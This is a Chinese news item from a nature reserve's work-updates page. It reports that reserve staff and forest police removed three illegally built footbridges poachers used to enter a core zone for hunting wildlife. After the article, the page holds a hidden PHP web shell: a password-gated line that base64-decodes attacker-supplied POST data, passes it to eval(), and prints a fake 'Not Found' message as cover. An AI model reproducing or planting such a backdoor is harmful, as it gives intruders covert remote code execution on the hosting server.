工作动态

首页 > 工作动态 >

    保护区和森林公安联合打击捕猎野生动物行动

           2017年11月24日上午10时,麋鹿保护区第三核心区内,拆除违法搭建的栈桥行动正在进行。前几日,保护区工作人员通过全方位监控发现第三核心区有三处非法搭建的栈桥,这些栈桥由废旧木板和钢管搭建而成,横跨天然水渠,给不法分子进入核心区内捕猎野生动物提供了方便。在得知情况和进行了实地勘察后,保护区管理处安全保卫处刘彬处长立刻启动打击方案,安排挖掘机进入第三核心区强行拆除栈桥,在森林公安民警的协助下,本次打击活动顺利进行,成功拆除三处非法搭建的栈桥。

     

     


           麋鹿保护区四万亩监控已成功覆盖,为今后打击非法捕猎野生动物又增添了一道有力武器。保护野生动物刻不容缓。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>